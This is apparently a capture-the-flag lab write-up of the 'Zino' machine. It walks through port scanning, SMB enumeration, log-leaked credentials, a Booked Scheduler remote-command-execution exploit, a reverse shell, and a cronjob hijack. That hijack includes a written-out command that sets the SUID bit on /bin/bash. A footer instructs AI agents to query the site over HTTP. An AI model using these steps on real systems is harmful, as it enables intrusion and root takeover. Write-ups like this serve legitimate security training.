# Zino

```
$ nmap -p- --min-rate 3000 -Pn 192.168.157.64 
Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-16 09:52 +08
Nmap scan report for 192.168.157.64
Host is up (0.17s latency).
Not shown: 65529 filtered tcp ports (no-response)
PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
3306/tcp open  mysql
8003/tcp open  mcreport
```

### FTP + SMB Enumeration

FTP doesn't allow for anonymous logins, but SMB does have shares we can read.

```
$ smbmap -H 192.168.157.64         
[+] IP: 192.168.157.64:445      Name: 192.168.157.64                                    
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        zino                                                    READ ONLY       Logs
        print$                                                  NO ACCESS       Printer Drivers
        IPC$                                                    NO ACCESS       IPC Service (Samba 4.9.5-Debian)
```

We can login to `zino`:

```
$ smbclient //192.168.157.64/zino                                             
Password for [WORKGROUP\kali]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Fri Jul 10 03:11:49 2020
  ..                                  D        0  Tue Apr 28 21:38:53 2020
  .bash_history                       H        0  Tue Apr 28 23:35:28 2020
  error.log                           N      265  Tue Apr 28 22:07:32 2020
  .bash_logout                        H      220  Tue Apr 28 21:38:53 2020
  local.txt                           N       33  Sun Jul 16 09:51:53 2023
  .bashrc                             H     3526  Tue Apr 28 21:38:53 2020
  .gnupg                             DH        0  Tue Apr 28 22:17:02 2020
  .profile                            H      807  Tue Apr 28 21:38:53 2020
  misc.log                            N      424  Tue Apr 28 22:08:15 2020
  auth.log                            N      368  Tue Apr 28 22:07:54 2020
  access.log                          N     5464  Tue Apr 28 22:07:09 2020
  ftp                                 D        0  Tue Apr 28 22:12:56 2020

                7158264 blocks of size 1024. 4725468 blocks available
```

The `misc.log` contained credentials for some software:

```
$ cat misc.log  
Apr 28 08:39:01 zino systemd[1]: Starting Clean php session files...
Apr 28 08:39:01 zino CRON[2791]: (CRON) info (No MTA installed, discarding output)
Apr 28 08:39:01 zino systemd[1]: phpsessionclean.service: Succeeded.
Apr 28 08:39:01 zino systemd[1]: Started Clean php session files.
Apr 28 08:39:01 zino systemd[1]: Set application username "admin"
Apr 28 08:39:01 zino systemd[1]: Set application password "adminadmin"
```

### Booked RCE

The only web port was port 8003, and it led us to this login page:

<figure><img src="/files/bEo6UYSYeYwv2Gv420g3" alt=""><figcaption></figcaption></figure>

There are some exploits for this:

```
$ searchsploit booked            
----------------------------------------------------------- ---------------------------------
 Exploit Title                                             |  Path
----------------------------------------------------------- ---------------------------------
Booked Scheduler 2.7.5 - Remote Command Execution (Metaspl | php/webapps/46486.rb
Booked Scheduler 2.7.5 - Remote Command Execution (RCE) (A | php/webapps/50594.py
Booked Scheduler 2.7.7 - Authenticated Directory Traversal | php/webapps/48428.txt
----------------------------------------------------------- ---------------------------------
```

We can use the credentials we got earlier to have RCE:

<figure><img src="/files/sIY8WjXmGVJ19upREDIZ" alt=""><figcaption></figcaption></figure>

We can then get a reverse shell through `nc`:

<figure><img src="/files/IPxVhc3O7AHtqxzQ4BPc" alt=""><figcaption></figcaption></figure>

## Privilege Escalation

### Cronjob Exploit -> Root

I downloaded `linpeas.sh` onto the machine and ran a scan. It found a cronjob we could hijack:

<figure><img src="/files/lGtY4rWew6s0NLSyYfuX" alt=""><figcaption></figcaption></figure>

We can write to this file:

```
www-data@zino:/tmp$ ls -la /var/www/html/booked/cleanup.py
-rwxrwxrwx 1 www-data www-data 164 Apr 28  2020 /var/www/html/booked/cleanup.py
```

Here's the script contents:

```
www-data@zino:/home/peter$ cat /var/www/html/booked/cleanup.py 
#!/usr/bin/env python
import os
import sys
try:
        os.system('rm -r /var/www/html/booked/uploads/reservation/* ')
except:
        print 'ERROR...'
sys.exit(0)
```

Since there's a `sys.exit(0)` function at the end, we cannot just append code. What we can do is just create a completely new `cleanup.py` file within that directory.

```bash
echo 'import os;os.system("chmod u+s /bin/bash")' > cleanup.py
```

Then we can just wait for a bit for the script to execute.

<figure><img src="/files/Lw2315wK8syqvVC7pGuC" alt=""><figcaption></figcaption></figure>


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://rouvin.gitbook.io/ibreakstuff/writeups/proving-grounds-practice/linux/zino.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.